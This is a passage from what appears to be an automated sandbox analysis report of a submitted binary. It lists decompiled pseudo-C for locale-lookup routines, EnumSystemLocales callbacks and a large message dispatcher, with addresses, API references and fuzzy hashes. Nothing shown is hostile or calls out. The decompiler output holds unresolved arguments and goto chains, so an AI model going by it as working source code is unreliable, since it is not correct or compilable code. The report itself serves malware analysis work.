					__eax = GetLocaleInfoW( *(__ebp + 8),  *(__ebp + 0xc), __edi, __ebx);
					__eflags = __eax;
					if(__eax != 0) {
						_push(__esi);
						_push(__esi);
						__eflags =  *((intOrPtr*)(__ebp + 0x14)) - __esi;
						if( *((intOrPtr*)(__ebp + 0x14)) != __esi) {
							_push( *((intOrPtr*)(__ebp + 0x14)));
							_push( *((intOrPtr*)(__ebp + 0x10)));
						} else {
							_push(__esi);
							_push(__esi);
						}
						 *(__ebp - 0x1c) = WideCharToMultiByte( *(__ebp + 0x18), __esi, __edi, 0xffffffff, ??, ??, ??, ??);
					}
					__eflags =  *((intOrPtr*)(__ebp - 0x20)) - __esi;
					if( *((intOrPtr*)(__ebp - 0x20)) != __esi) {
						__eax = E00412A4D();
						__ecx = __edi;
					}
					__eax =  *(__ebp - 0x1c);
				} else {
					__eax = __ebx + __ebx;
					__eax = E00412247(__ebx + __ebx);
					__edi = __eax;
					__eflags = __edi;
					if(__edi != 0) {
						 *((intOrPtr*)(__ebp - 0x20)) = 1;
						goto L5;
					}
				}
				return E00412BDF(0);
			}




                                                                              0x0041ef9f
                                                                              0x0041efa8
                                                                              0x0041efaf
                                                                              0x0041efb1
                                                                              0x0041efca
                                                                              0x0041efd2
                                                                              0x0041efd8
                                                                              0x0041efda
                                                                              0x0041efdc
                                                                              0x0041efdd
                                                                              0x0041efde
                                                                              0x0041efe1
                                                                              0x0041efe7
                                                                              0x0041efea
                                                                              0x0041efe3
                                                                              0x0041efe3
                                                                              0x0041efe4
                                                                              0x0041efe4
                                                                              0x0041effa
                                                                              0x0041effa
                                                                              0x0041effd
                                                                              0x0041f000
                                                                              0x0041f003
                                                                              0x0041f008
                                                                              0x0041f008
                                                                              0x0041f009
                                                                              0x0041efb3
                                                                              0x0041efb3
                                                                              0x0041efb7
                                                                              0x0041efbd
                                                                              0x0041efbf
                                                                              0x0041efc1
                                                                              0x0041efc3
                                                                              0x00000000
                                                                              0x0041efc3
                                                                              0x0041efc1
                                                                              0x0041f028

                                                                              APIs
                                                                                • Part of subcall function 00412ABE: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00412AD8
                                                                                • Part of subcall function 00412ABE: GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 00412AE9
                                                                                • Part of subcall function 00412ABE: VirtualQuery.KERNEL32(?,?,0000001C,?,?,0000001C), ref: 00412B2F
                                                                              • GetLocaleInfoW.KERNEL32(00000001,?,?,00000000,?,?,00000001), ref: 0041EFD2
                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,?,?,00000000,00000000,?,00000000,?,?,00000001), ref: 0041EFF4
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: InfoQueryVirtual$ByteCharLocaleMultiSystemWide
                                                                              • String ID:
                                                                              • API String ID: 2568233206-0
                                                                              • Opcode ID: 088f6bf9eedabda617fdd74b9fef462a5c718d04fcd9b690743252dbfa66f214
                                                                              • Instruction ID: 62df931b900ab792e6f8fad4900931795016fd4409acc43c2fbf43c909b8f646
                                                                              • Opcode Fuzzy Hash: 088f6bf9eedabda617fdd74b9fef462a5c718d04fcd9b690743252dbfa66f214
                                                                              • Instruction Fuzzy Hash: AE018435805129BBCF219F62CD45DDFBF79AF49760B10012AFC24A21A0C7385D92DBA8
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0041EE75, Relevance: 3.0, APIs: 2, Instructions: 43COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 38%
                                                                              			E0041EE75(void* __ecx, void* __eflags) {
				void* _t25;

				E00412ABE(__ecx, __eflags);
				 *(_t25 - 4) =  *(_t25 - 4) | 0xffffffff;
				__eflags = 0;
				if(0 != 0) {
					L5:
					__eax = GetLocaleInfoA( *(__ebp + 8),  *(__ebp + 0xc), __esi,  *(__ebp - 0x20));
					__eflags = __eax;
					if(__eax != 0) {
						__eflags =  *((intOrPtr*)(__ebp + 0x14)) - __edi;
						if( *((intOrPtr*)(__ebp + 0x14)) != __edi) {
							_push( *((intOrPtr*)(__ebp + 0x14)));
							_push( *((intOrPtr*)(__ebp + 0x10)));
						} else {
							_push(__edi);
							_push(__edi);
						}
						 *(__ebp - 0x1c) = MultiByteToWideChar( *(__ebp + 0x18), __ebx, __esi, 0xffffffff, ??, ??);
					}
					__eflags =  *((intOrPtr*)(__ebp - 0x24)) - __edi;
					if( *((intOrPtr*)(__ebp - 0x24)) != __edi) {
						__eax = E00412A4D();
						__ecx = __esi;
					}
					__eax =  *(__ebp - 0x1c);
				} else {
					__eax = E00412247( *(__ebp - 0x20));
					__esi = __eax;
					__eflags = __esi;
					if(__esi != 0) {
						 *((intOrPtr*)(__ebp - 0x24)) = 1;
						goto L5;
					}
				}
				return E00412BDF(0);
			}




                                                                              0x0041ee78
                                                                              0x0041ee81
                                                                              0x0041ee88
                                                                              0x0041ee8a
                                                                              0x0041ee9e
                                                                              0x0041eea8
                                                                              0x0041eeae
                                                                              0x0041eeb0
                                                                              0x0041eeb2
                                                                              0x0041eeb5
                                                                              0x0041eebb
                                                                              0x0041eebe
                                                                              0x0041eeb7
                                                                              0x0041eeb7
                                                                              0x0041eeb8
                                                                              0x0041eeb8
                                                                              0x0041eece
                                                                              0x0041eece
                                                                              0x0041eed1
                                                                              0x0041eed4
                                                                              0x0041eed7
                                                                              0x0041eedc
                                                                              0x0041eedc
                                                                              0x0041eedd
                                                                              0x0041ee8c
                                                                              0x0041ee8f
                                                                              0x0041ee95
                                                                              0x0041ee97
                                                                              0x0041ee99
                                                                              0x0041ee9b
                                                                              0x00000000
                                                                              0x0041ee9b
                                                                              0x0041ee99
                                                                              0x0041eee8

                                                                              APIs
                                                                                • Part of subcall function 00412ABE: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00412AD8
                                                                                • Part of subcall function 00412ABE: GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 00412AE9
                                                                                • Part of subcall function 00412ABE: VirtualQuery.KERNEL32(?,?,0000001C,?,?,0000001C), ref: 00412B2F
                                                                              • GetLocaleInfoA.KERNEL32(00000001,?,?,?,?,?,00000001), ref: 0041EEA8
                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,000000FF,?,?,?,?,?,?,00000001), ref: 0041EEC8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: InfoQueryVirtual$ByteCharLocaleMultiSystemWide
                                                                              • String ID:
                                                                              • API String ID: 2568233206-0
                                                                              • Opcode ID: 31845502904a19e4f6f45c514b549b5e4b4c752065dbb7ce533263ef9262c57a
                                                                              • Instruction ID: f5a8e3b55202f3b6e51263eada3996ee8f2096e49c77ef7459e92eddd8e29681
                                                                              • Opcode Fuzzy Hash: 31845502904a19e4f6f45c514b549b5e4b4c752065dbb7ce533263ef9262c57a
                                                                              • Instruction Fuzzy Hash: B0018F35800629AECF229F66DD458DF7BB4EF44364B20022AFD34B21A0D6394DA1CA98
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0041C483, Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 90%
                                                                              			E0041C483(void* __eflags) {
				void* _t2;
				intOrPtr _t5;
				int _t7;
				intOrPtr _t9;

				_t2 = E00411A30( *0x45a85c);
				asm("sbb eax, eax");
				_t5 =  ~(_t2 - 3) + 1;
				 *0x45a84c = _t5;
				if(_t5 == 0) {
					_t9 =  *0x45a85c; // 0x0
					 *0x45a858 = E0041BFBF(_t9);
				} else {
					 *0x45a858 = 2;
				}
				_t7 = EnumSystemLocalesA(E0041C2FB, 1);
				if(( *0x45a840 & 0x00000004) == 0) {
					 *0x45a840 =  *0x45a840 & 0x00000000;
					return _t7;
				}
				return _t7;
			}







                                                                              0x0041c489
                                                                              0x0041c493
                                                                              0x0041c495
                                                                              0x0041c497
                                                                              0x0041c49c
                                                                              0x0041c4aa
                                                                              0x0041c4b5
                                                                              0x0041c49e
                                                                              0x0041c49e
                                                                              0x0041c49e
                                                                              0x0041c4c1
                                                                              0x0041c4ce
                                                                              0x0041c4d0
                                                                              0x00000000
                                                                              0x0041c4d0
                                                                              0x0041c4d7

                                                                              APIs
                                                                              • _strlen.LIBCMT ref: 0041C489
                                                                              • EnumSystemLocalesA.KERNEL32(0041C2FB,00000001,?,004575B8,00415BC9,?,0045A5A4,?), ref: 0041C4C1
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: EnumLocalesSystem_strlen
                                                                              • String ID:
                                                                              • API String ID: 216762292-0
                                                                              • Opcode ID: 6e6e589fca30c9eaf8b60272a9465ca4d61f593d7d242cdc9f14558ee9eab4a4
                                                                              • Instruction ID: 44d76e012c20fd585c9bfbe2dc1ba6b255ce87f136c1cdbd9f66aba2ca99764d
                                                                              • Opcode Fuzzy Hash: 6e6e589fca30c9eaf8b60272a9465ca4d61f593d7d242cdc9f14558ee9eab4a4
                                                                              • Instruction Fuzzy Hash: 1FE0EDB05A43455BD710BF70ED557613BE1E71571AF10433AE501812A2C77984928A4E
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0041C3C6, Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 84%
                                                                              			E0041C3C6(void* __eflags) {
				void* _t2;
				int _t6;

				_t2 = E00411A30( *0x45a854);
				asm("sbb eax, eax");
				 *0x45a850 =  ~(_t2 - 3) + 1;
				_t6 = EnumSystemLocalesA(E0041BFDC, 1);
				if(( *0x45a840 & 0x00000004) == 0) {
					 *0x45a840 =  *0x45a840 & 0x00000000;
					return _t6;
				}
				return _t6;
			}





                                                                              0x0041c3cc
                                                                              0x0041c3d7
                                                                              0x0041c3e1
                                                                              0x0041c3e6
                                                                              0x0041c3f3
                                                                              0x0041c3f5
                                                                              0x00000000
                                                                              0x0041c3f5
                                                                              0x0041c3fc

                                                                              APIs
                                                                              • _strlen.LIBCMT ref: 0041C3CC
                                                                              • EnumSystemLocalesA.KERNEL32(0041BFDC,00000001,?,004575B8,00415BC9,?,0045A5A4,?), ref: 0041C3E6
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: EnumLocalesSystem_strlen
                                                                              • String ID:
                                                                              • API String ID: 216762292-0
                                                                              • Opcode ID: c73b850454567d70de123fdb6cce613a8d4ca8c666d61f6c966823232ef5a258
                                                                              • Instruction ID: 4194295bfc4b2aa7ef8b692791f9456e205b6506c958c703b826f5780925dcdd
                                                                              • Opcode Fuzzy Hash: c73b850454567d70de123fdb6cce613a8d4ca8c666d61f6c966823232ef5a258
                                                                              • Instruction Fuzzy Hash: CED05E709A03085FEB10BF30AE097603BE0F714B0AF400329EF01801E2C3BD8456860E
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0042787E, Relevance: 1.9, APIs: 1, Instructions: 440COMMONCrypto
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 22%
                                                                              			E0042787E(intOrPtr* __ecx) {
				signed int _t141;
				signed int _t146;
				signed int _t148;
				signed int _t149;
				unsigned int _t150;
				signed int _t152;
				signed int _t156;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				unsigned int _t163;
				signed int _t167;
				signed int _t171;
				unsigned int _t174;
				signed int _t175;
				signed int _t179;
				signed int _t180;
				signed int* _t184;
				signed int _t186;
				signed int _t194;
				unsigned int _t204;
				void* _t206;

				_t187 = __ecx;
				E004128A0(E00430EFD, _t206);
				 *(_t206 - 0x10) =  *(_t206 - 0x10) & 0x00000000;
				_t179 =  *(_t206 + 8);
				_t201 = __ecx;
				if(_t179 != 0x111) {
					if(_t179 != 0x4e) {
						_t204 =  *(_t206 + 0x10);
						if(_t179 == 6) {
							E004272AB(_t187, _t201,  *((intOrPtr*)(_t206 + 0xc)), E00426406(_t206, _t204));
						}
						if(_t179 != 0x20) {
							L10:
							_t141 =  *(_t201 + 0x48);
							if(_t141 == 0) {
								L19:
								_t180 =  *((intOrPtr*)( *_t201 + 0x28))();
								 *(_t206 - 0x14) = _t180;
								E0042E21A(7);
								_t184 = 0x458610 + (((_t180 ^  *(_t206 + 8)) & 0x000001ff) + ((_t180 ^  *(_t206 + 8)) & 0x000001ff) * 2) * 4;
								_t146 =  *(_t206 - 0x14);
								if( *(_t206 + 8) !=  *_t184) {
									L24:
									 *_t184 =  *(_t206 + 8);
									_t184[2] = _t146;
									while(1) {
										if(_t146 == 0) {
											break;
										}
										_t147 =  *(_t206 - 0x14);
										_push(0);
										_push(0);
										if( *(_t206 + 8) >= 0xc000) {
											_t148 =  *(_t147 + 4);
											while(1) {
												_push(0xc000);
												_push(_t148);
												_t149 = E004251B9();
												 *(_t206 + 0x10) = _t149;
												if(_t149 == 0) {
													break;
												}
												_t150 =  *(_t206 + 0x10);
												_t152 =  *(_t206 + 0x10);
												if( *((intOrPtr*)( *((intOrPtr*)(_t150 + 0x10)))) ==  *(_t206 + 8)) {
													_t184[1] = _t152;
													E0042E27D(7);
													L105:
													_t156 =  *((intOrPtr*)( *((intOrPtr*)( *(_t206 + 0x10) + 0x14))))( *((intOrPtr*)(_t206 + 0xc)), _t204);
													L106:
													 *(_t206 - 0x10) = _t156;
													goto L107;
												}
												_push(0);
												_push(0);
												_t148 = _t152 + 0x18;
											}
											L34:
											_t146 =  *( *(_t206 - 0x14));
											 *(_t206 - 0x14) = _t146;
											continue;
										}
										_push( *(_t206 + 8));
										_push( *(_t147 + 4));
										_t161 = E004251B9();
										 *(_t206 + 0x10) = _t161;
										if(_t161 == 0) {
											goto L34;
										}
										_t184[1] = _t161;
										E0042E27D(7);
										L28:
										_t163 =  *(_t206 + 0x10);
										_t184 =  *(_t163 + 0x14);
										_t147 =  *(_t163 + 0x10);
										_t194 =  *(_t163 + 0x10) - 1;
										if(_t194 > 0x40) {
											goto L107;
										}
										switch( *((intOrPtr*)(_t194 * 4 +  &M00427D85))) {
											case 0:
												_push( *(__ebp + 0xc));
												_push(E0042A726());
												goto L55;
											case 1:
												_push( *(__ebp + 0xc));
												goto L55;
											case 2:
												_push(__esi >> 0x10);
												__eax = __si & 0x0000ffff;
												_push(__si & 0x0000ffff);
												__eax = E00426406(__ebp,  *(__ebp + 0xc));
												goto L59;
											case 3:
												_push(__esi);
												__eax = E00426406(__ebp,  *(__ebp + 0xc));
												goto L84;
											case 4:
												_push(__esi);
												L55:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L106;
											case 5:
												__ecx = __ebp - 0x24;
												E0042A39C(__ebp - 0x24) =  *(__esi + 4);
												 *(__ebp - 4) =  *(__ebp - 4) & 0x00000000;
												__ecx = __ebp - 0x74;
												 *(__ebp - 0x20) =  *(__esi + 4);
												__eax = E004259FF(__ebp - 0x74, __eflags);
												__eax =  *__esi;
												__esi =  *(__esi + 8);
												_push(__eax);
												 *(__ebp - 4) = 1;
												 *(__ebp - 0x58) = __eax;
												__eax = E0042642D();
												__eflags = __eax;
												if(__eax == 0) {
													__eax =  *(__edi + 0x48);
													__eflags = __eax;
													if(__eax != 0) {
														__ecx = __eax + 0x20;
														__eax = E004235A0(__eax + 0x20,  *(__ebp - 0x58));
														__eflags = __eax;
														if(__eax != 0) {
															 *(__ebp - 0x28) = __eax;
														}
													}
													__eax = __ebp - 0x74;
												}
												_push(__esi);
												_push(__eax);
												__eax = __ebp - 0x24;
												_push(__ebp - 0x24);
												__ecx = __edi;
												__eax =  *__ebx();
												 *(__ebp - 0x20) =  *(__ebp - 0x20) & 0x00000000;
												 *(__ebp - 0x58) =  *(__ebp - 0x58) & 0x00000000;
												__ecx = __ebp - 0x74;
												 *(__ebp - 0x10) = __ebp - 0x24;
												 *(__ebp - 4) = 0;
												__eax = E00426B03(__ebp - 0x74);
												goto L51;
											case 6:
												__ecx = __ebp - 0x24;
												E0042A39C(__ebp - 0x24) =  *(__esi + 4);
												_push( *(__esi + 8));
												 *(__ebp - 0x20) =  *(__esi + 4);
												__eax = __ebp - 0x24;
												_push(__ebp - 0x24);
												__ecx = __edi;
												 *(__ebp - 4) = 2;
												__eax =  *__ebx();
												_t89 = __ebp - 0x20;
												 *_t89 =  *(__ebp - 0x20) & 0x00000000;
												__eflags =  *_t89;
												 *(__ebp - 0x10) = __ebp - 0x24;
												L51:
												 *(__ebp - 4) =  *(__ebp - 4) | 0xffffffff;
												__ecx = __ebp - 0x24;
												__eax = E0042A79C(__ebp - 0x24);
												goto L107;
											case 7:
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax = E00426406(__ebp, __esi);
												goto L58;
											case 8:
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												goto L84;
											case 9:
												_push(__esi);
												_push( *(__ebp + 0xc));
												goto L85;
											case 0xa:
												_push(__esi);
												_push(E00429AB5());
												__eax =  *(__ebp + 0xc);
												__eax =  *(__ebp + 0xc) >> 0x10;
												__eflags = __eax;
												L58:
												_push(__eax);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												L59:
												_push(__eax);
												__ecx = __edi;
												__eax =  *__ebx();
												goto L106;
											case 0xb:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L107;
											case 0xc:
												_push( *(__ebp + 0xc));
												goto L91;
											case 0xd:
												_push(__esi);
												goto L88;
											case 0xe:
												__eax =  *(__ebp + 0xc);
												__eax =  *(__ebp + 0xc) >> 0x10;
												__eflags = __eax;
												_push(__eax);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												goto L63;
											case 0xf:
												__esi = __esi >> 0x10;
												__eax = __ax;
												_push(__ax);
												__eax = __si;
												goto L63;
											case 0x10:
												_push(__esi >> 0x10);
												__eax = __si & 0x0000ffff;
												goto L95;
											case 0x11:
												_push(E00426406(__ebp, __esi));
												L88:
												_push( *(__ebp + 0xc));
												goto L89;
											case 0x12:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L106;
											case 0x13:
												_push(E00426406(__ebp,  *(__ebp + 0xc)));
												_push(E00426406(__ebp, __esi));
												__eax = 0;
												__eflags =  *((intOrPtr*)(__edi + 0x1c)) - __esi;
												_t107 =  *((intOrPtr*)(__edi + 0x1c)) == __esi;
												__eflags = _t107;
												__eax = 0 | _t107;
												goto L67;
											case 0x14:
												_push( *(__ebp + 0xc));
												__eax = E0042A726();
												goto L69;
											case 0x15:
												_push( *(__ebp + 0xc));
												__eax = E00429AB5();
												goto L69;
											case 0x16:
												_push(__esi >> 0x10);
												__eax = __si & 0x0000ffff;
												_push(__si & 0x0000ffff);
												_push( *(__ebp + 0xc));
												__eax = E00429AB5();
												goto L67;
											case 0x17:
												_push( *(__ebp + 0xc));
												goto L74;
											case 0x18:
												_push(__esi);
												L74:
												__eax = E00426406(__ebp);
												L69:
												_push(__eax);
												goto L91;
											case 0x19:
												_push(__esi >> 0x10);
												__eax = __si & 0x0000ffff;
												goto L77;
											case 0x1a:
												__eax = __si;
												__eflags = __esi;
												__ecx = __si;
												_push(__si);
												L77:
												_push(__eax);
												__eax = E00426406(__ebp,  *(__ebp + 0xc));
												goto L67;
											case 0x1b:
												_push(__esi);
												__eax = E00426406(__ebp,  *(__ebp + 0xc));
												L63:
												_push(__eax);
												goto L89;
											case 0x1c:
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax = E00426406(__ebp, __esi);
												goto L93;
											case 0x1d:
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												__eflags = __eax - 0x27;
												__ecx = __cx;
												 *((intOrPtr*)(__ebp + 8)) = __cx;
												 *(__ebp + 0xc) = __cx;
												if(__eax != 0x27) {
													_push( *(__ebp + 0xc));
													_push( *((intOrPtr*)(__ebp + 8)));
													L89:
													__ecx = __edi;
													__eax =  *__ebx();
													goto L107;
												}
												_push(E00426406(__ebp, __esi));
												_push( *(__ebp + 0xc));
												_push( *((intOrPtr*)(__ebp + 8)));
												goto L96;
											case 0x1e:
												_push(__esi);
												L91:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L107;
											case 0x1f:
												_push(__esi);
												_push( *(__ebp + 0xc));
												__ecx = __edi;
												__eax =  *__ebx();
												goto L98;
											case 0x20:
												__eax = __si;
												__eflags = __esi;
												__ecx = __si;
												_push(__si);
												L84:
												_push(__eax);
												L85:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L106;
											case 0x21:
												__eax =  *(__ebp + 0xc);
												_push(__esi);
												__eax =  *(__ebp + 0xc) >> 0x10;
												__eflags = __eax;
												L93:
												_push(__eax);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												L67:
												_push(__eax);
												goto L96;
											case 0x22:
												__eax = __si;
												__eflags = __esi;
												__ecx = __si;
												_push(__si);
												L95:
												_push(__eax);
												_push( *(__ebp + 0xc));
												L96:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L107;
											case 0x23:
												__eax = __si & 0x0000ffff;
												_push(__esi);
												_push(__si & 0x0000ffff);
												__eax =  *(__ebp + 0xc);
												__eax =  *(__ebp + 0xc) >> 0x10;
												__eflags = __eax;
												_push(__eax);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												_push( *(__ebp + 0xc) & 0x0000ffff);
												__ecx = __edi;
												__eax =  *__ebx();
												 *(__ebp - 0x10) =  *(__ebp + 0xc) & 0x0000ffff;
												L100:
												__eflags = _t175;
												if(_t175 != 0) {
													goto L107;
												}
												goto L37;
											case 0x24:
												goto L107;
											case 0x25:
												__ecx = __edi;
												__eax =  *__ebx();
												__eflags = __eax;
												 *(__ebp - 0x10) = __eax;
												if(__eax == 0) {
													goto L107;
												}
												L37:
												_t159 = 0;
												__eflags = 0;
												goto L38;
										}
									}
									_t54 =  &(_t184[1]);
									 *_t54 = _t184[1] & _t146;
									E0042E27D(7);
									goto L37;
								}
								if(_t146 != _t184[2]) {
									goto L24;
								}
								_t186 = _t184[1];
								 *(_t206 + 0x10) = _t186;
								E0042E27D(7);
								if(_t186 == 0) {
									goto L37;
								}
								if( *(_t206 + 8) < 0xc000) {
									goto L28;
								}
								goto L105;
							}
							if( *(_t141 + 0x70) <= 0) {
								goto L19;
							}
							if(_t179 < 0x200) {
								L14:
								if(_t179 < 0x100) {
									L16:
									if(_t179 < 0x281) {
										goto L19;
									}
									if(_t179 > 0x291) {
										goto L19;
									}
									L18:
									_t167 =  *((intOrPtr*)( *( *(_t201 + 0x48)) + 0x94))(_t179,  *((intOrPtr*)(_t206 + 0xc)), _t204, _t206 - 0x10);
									if(_t167 != 0) {
										goto L107;
									}
									goto L19;
								}
								if(_t179 <= 0x10f) {
									goto L18;
								}
								goto L16;
							}
							if(_t179 <= 0x209) {
								goto L18;
							}
							goto L14;
						} else {
							_t171 = E0042730C(_t201, _t204, _t204 >> 0x10);
							if(_t171 != 0) {
								L98:
								 *(_t206 - 0x10) = 1;
								L107:
								_t157 =  *(_t206 + 0x14);
								if(_t157 != 0) {
									 *_t157 =  *(_t206 - 0x10);
								}
								_t159 = 1;
								L38:
								 *[fs:0x0] =  *((intOrPtr*)(_t206 - 0xc));
								return _t159;
							}
							goto L10;
						}
					}
					_t174 =  *(_t206 + 0x10);
					if( *_t174 == 0) {
						goto L37;
					}
					_push(_t206 - 0x10);
					_push(_t174);
					_push( *((intOrPtr*)(_t206 + 0xc)));
					_t175 =  *((intOrPtr*)( *__ecx + 0xec))();
					goto L100;
				}
				_push( *(_t206 + 0x10));
				_push( *((intOrPtr*)(_t206 + 0xc)));
				if( *((intOrPtr*)( *__ecx + 0xe8))() == 0) {
					goto L37;
				}
				goto L98;
			}

























                                                                              0x0042787e
                                                                              0x00427883
                                                                              0x0042788b
                                                                              0x00427890
                                                                              0x0042789b
                                                                              0x0042789d
                                                                              0x004278bd
                                                                              0x004278e5
                                                                              0x004278e8
                                                                              0x004278f5
                                                                              0x004278f5
                                                                              0x004278fd
                                                                              0x00427917
                                                                              0x00427917
                                                                              0x0042791c
                                                                              0x00427970
                                                                              0x00427977
                                                                              0x00427979
                                                                              0x00427987
                                                                              0x00427992
                                                                              0x0042799b
                                                                              0x0042799e
                                                                              0x004279c8
                                                                              0x004279cb
                                                                              0x004279cd
                                                                              0x00427a57
                                                                              0x00427a59
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004279dc
                                                                              0x004279df
                                                                              0x004279e1
                                                                              0x004279e3
                                                                              0x00427a1d
                                                                              0x00427a3d
                                                                              0x00427a3d
                                                                              0x00427a42
                                                                              0x00427a43
                                                                              0x00427a4a
                                                                              0x00427a4d
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00427a22
                                                                              0x00427a2d
                                                                              0x00427a30
                                                                              0x00427d58
                                                                              0x00427d5b
                                                                              0x00427d60
                                                                              0x00427d6c
                                                                              0x00427d6e
                                                                              0x00427d6e
                                                                              0x00000000
                                                                              0x00427d6e
                                                                              0x00427a36
                                                                              0x00427a38
                                                                              0x00427a3a
                                                                              0x00427a3a
                                                                              0x00427a4f
                                                                              0x00427a52
                                                                              0x00427a54
                                                                              0x00000000
                                                                              0x00427a54
                                                                              0x004279e5
                                                                              0x004279e8
                                                                              0x004279eb
                                                                              0x004279f2
                                                                              0x004279f5
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004279f9
                                                                              0x004279fc
                                                                              0x00427a01
                                                                              0x00427a01
                                                                              0x00427a04
                                                                              0x00427a07
                                                                              0x00427a0a
                                                                              0x00427a10
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00427a16
                                                                              0x00000000
                                                                              0x00427a7c
                                                                              0x00427a84
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00427a8a
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00427aa3
                                                                              0x00427aa4
                                                                              0x00427aa7
                                                                              0x00427aab
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00427ab5
                                                                              0x00427ab9
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00427b89
                                                                              0x00427b8a
                                                                              0x00427b8a
                                                                              0x00427b8c
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00427ac3
                                                                              0x00427acb
                                                                              0x00427ace
                                                                              0x00427ad2
                                                                              0x00427ad5
                                                                              0x00427ad8
                                                                              0x00427add
                                                                              0x00427adf
                                                                              0x00427ae2
                                                                              0x00427ae3
                                                                              0x00427ae7
                                                                              0x00427aea
                                                                              0x00427aef
                                                                              0x00427af1
                                                                              0x00427af3
                                                                              0x00427af6
                                                                              0x00427af8
                                                                              0x00427afd
                                                                              0x00427b00
                                                                              0x00427b05
                                                                              0x00427b07
                                                                              0x00427b09
                                                                              0x00427b09
                                                                              0x00427b07
                                                                              0x00427b0c
                                                                              0x00427b0c
                                                                              0x00427b0f
                                                                              0x00427b10
                                                                              0x00427b11
                                                                              0x00427b14
                                                                              0x00427b15
